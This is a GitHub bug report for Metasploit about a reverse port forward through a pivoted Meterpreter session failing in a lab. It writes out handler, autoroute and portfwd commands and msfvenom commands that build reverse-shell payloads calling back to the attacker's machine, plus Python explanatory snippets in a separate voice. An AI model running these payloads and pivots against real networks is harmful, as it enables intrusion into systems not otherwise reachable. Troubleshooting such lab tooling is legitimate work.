rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Reverse Port Forwarding to get meterpreter through pivoting meterpreter sessions #15089

Open Hyatche opened 3 years ago

Hyatche commented 3 years ago

Steps to reproduce

Hi, I have the following lab:

  1. Parrot security Linux with metasploit msfconsole (Framework: 6.0.38-dev Console : 6.0.38-dev) : IP -> 10.0.0.4
  2. Ubuntu 20.04 with 2 interfaces : IP 1 -> 10.0.0.5 and IP 2 -> 10.5.0.4
  3. Debian 10 : IP -> 10.5.0.3

The Parrot VM cannot reach the Debian VM directly, and vice versa.

On the Parrot VM I start msfconsole (version 6.0.38-dev) and execute the following commands:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.0.0.4
set LPORT 4343
exploit -j
set payload linux/x86/meterpreter/reverse_tcp
set LPORT 6666
exploit -j
# Once the first (Linux) Meterpreter session is open
use post/multi/manage/autoroute
set SESSION 1
exploit

sessions -i 1
# Reverse-forward port 6666 of the Ubuntu box to port 6666 of the Parrot box
portfwd add -R -L 10.0.0.4 -l 6666 -p 6666
bg
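For context, what `portfwd add -R` sets up on the pivot is conceptually just a TCP relay: a listener on the Ubuntu box that shuttles bytes back to the handler on the Parrot box. The sketch below is a toy localhost-only model of that relay (plain sockets, not Metasploit code; the port numbers are borrowed from the lab above), useful for reasoning about what a working forward should do:

```python
import socket
import threading

def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src closes."""
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)

# "Handler" side: an echo server standing in for the msfconsole listener.
handler = socket.socket()
handler.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
handler.bind(("127.0.0.1", 4343))
handler.listen(1)

# "Pivot" side: the reverse-forward listener (what portfwd -R opens on Ubuntu).
pivot = socket.socket()
pivot.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pivot.bind(("127.0.0.1", 6666))
pivot.listen(1)

def echo_once() -> None:
    conn, _ = handler.accept()
    conn.sendall(conn.recv(1024))
    conn.close()

def relay_once() -> None:
    client, _ = pivot.accept()
    upstream = socket.create_connection(("127.0.0.1", 4343))
    threading.Thread(target=pump, args=(client, upstream), daemon=True).start()
    pump(upstream, client)

threading.Thread(target=echo_once, daemon=True).start()
threading.Thread(target=relay_once, daemon=True).start()

# "Payload" side: connect through the pivot and expect the echo back.
payload = socket.create_connection(("127.0.0.1", 6666))
payload.sendall(b"stage-request")
echoed = payload.recv(1024)
print(echoed)  # b'stage-request'
```

If the real forward behaved like this model, the Debian payload's bytes would reach the handler intact; the crash reported below suggests they do not.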

The Ubuntu payload is generated with `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=4343 -f elf -o payload`.

The Debian payload is generated with `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.5.0.4 LPORT=6666 -f elf -o payload_debian`.
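When a crash like the one below occurs, one quick sanity check is that each msfvenom ELF really matches the target's architecture (a 32-bit payload on a 64-bit-only userland, or vice versa, also dies with SIGSEGV/SIGILL). A small standard-library helper that reads the ELF class and machine type from the file header (not part of Metasploit; the field offsets follow the ELF specification):

```python
import struct

def elf_arch(header: bytes) -> str:
    """Return a rough architecture label from the first 20 bytes of
    an ELF file: magic, EI_CLASS (offset 4), e_machine (offset 18)."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bits = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown")
    # e_machine is a little-endian u16 at offset 18 (after the
    # 16-byte e_ident block and the u16 e_type field).
    (e_machine,) = struct.unpack_from("<H", header, 18)
    machines = {3: "x86", 62: "x86-64", 40: "ARM"}
    return f"{bits} {machines.get(e_machine, hex(e_machine))}"

# Synthetic header as a linux/x86 payload would have it:
# EI_CLASS=1 (32-bit), little-endian, e_type=2 (EXEC), e_machine=3 (EM_386).
fake_x86 = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8 \
           + struct.pack("<HH", 2, 3)
print(elf_arch(fake_x86))  # 32-bit x86
```

Against a real file: `elf_arch(open("payload_debian", "rb").read(20))` (filename as generated above); `file payload_debian` reports the same information.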

On the Ubuntu box, after the portfwd command has been executed, `netstat -tlupn | grep 6666` shows port 6666 in the LISTEN state (opened by the Meterpreter payload).

Expected behavior

A reverse TCP Meterpreter session from the Debian box.

Current behavior

Nothing arrives on the Parrot box. The Debian payload dies with a segmentation fault or an illegal instruction.
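A crash of this shape fits the fact that `linux/x86/meterpreter/reverse_tcp` is a staged payload: the tiny stager connects back, reads a 4-byte little-endian stage length, reads that many bytes of stage, and jumps into them with no validation. If the reverse forward delivers nothing, truncated data, or bytes intended for another handler, the stager executes garbage, which presents exactly as SIGSEGV or SIGILL. A toy model of that framing (an assumption-labelled sketch, not the real stager, which performs no such checks):

```python
import io
import struct

def read_stage(stream: io.BufferedIOBase) -> bytes:
    """Model of the staging protocol: a 4-byte little-endian length,
    then exactly that many bytes of stage code."""
    (length,) = struct.unpack("<I", stream.read(4))
    stage = stream.read(length)
    if len(stage) != length:
        # The real stager has no such guard: it would jump into
        # whatever partial buffer it received -> SIGSEGV / SIGILL.
        raise EOFError(f"expected {length} bytes, got {len(stage)}")
    return stage

# Intact transfer: length prefix followed by the full (fake) stage.
good = io.BytesIO(struct.pack("<I", 5) + b"\x90" * 5)
print(read_stage(good))  # b'\x90\x90\x90\x90\x90'

# Broken relay: the connection closes before the stage arrives.
truncated = io.BytesIO(struct.pack("<I", 5) + b"\x90" * 2)
try:
    read_stage(truncated)
except EOFError as exc:
    print(exc)
```

One way to test this hypothesis is to try a stageless payload (`linux/x86/meterpreter_reverse_tcp`), which does not depend on the staging handshake surviving the forward.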

Metasploit version

6.0.38-dev.

Additional Information

If I replace the Meterpreter portfwd with an equivalent `ssh -R` remote forward, the Debian payload works.

Metasploit log

Module/Datastore

The following global/module datastore and database setup were configured before the issue occurred:

```
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=post/multi/manage/autoroute

[multi/manage/autoroute]
WORKSPACE=
VERBOSE=false
SESSION=1
SUBNET=
NETMASK=255.255.255.0
CMD=autoadd
```

History

The following commands were run during the session and before this issue occurred:

```
340  version
341  set loglevel 3
342  use exploit/multi/handler
343  set payload linux/x86/meterpreter/reverse_tcp
344  set LHOST 10.0.0.4
345  set LPORT 4343
346  exploit -j
347  set LPORT 6666
348  exploit -j
349  use post/multi/manage/autoroute
350  set SESSION 1
351  exploit
352  sessions -i 1
353  portfwd -R -L 10.0.0.4 -l 6666 -p 6666
354  portfwd add -R -L 10.0.0.4 -l 6666 -p 6666
355  portfwd
356  bg
357  debug
```

Framework Errors

The following framework errors occurred before the issue occurred:

```
[04/23/2021 13:13:49] [e(0)] core: Failed to connect to the database: No database YAML file
[04/23/2021 14:02:44] [e(0)] core: Failed to connect to the database: No database YAML file
[04/23/2021 14:05:56] [e(0)] core: Failed to connect to the database: No database YAML file
```

Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

Framework Logs

The following framework logs were recorded before the issue occurred:

```
[04/23/2021 13:12:15] [e(0)] core: Failed to connect to the database: No database YAML file
[04/23/2021 14:27:31] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: reverse to reverse
[04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: bind to reverse
[04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: noconn to reverse
[04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: none to reverse
[04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse
[04/23/2021 14:27:37] [d(1)] core: Module linux/x86/meterpreter/reverse_tcp is compatible with multi/handler
[04/23/2021 14:29:45] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x86/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule
[04/23/2021 14:29:45] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x64/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule
[04/23/2021 14:29:58] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x86/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule
[04/23/2021 14:29:58] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x64/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule
[04/23/2021 14:30:29] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x86/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule
[04/23/2021 14:30:29] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x64/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule
[04/23/2021 14:32:18] [i(2)] core: Reloading post module multi/manage/autoroute. Ambiguous module warnings are safe to ignore
```

Web Service Logs

The following web service logs were recorded before the issue occurred:

```
msf-ws.log does not exist.
```

Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 6.0.38-dev
Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```
github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.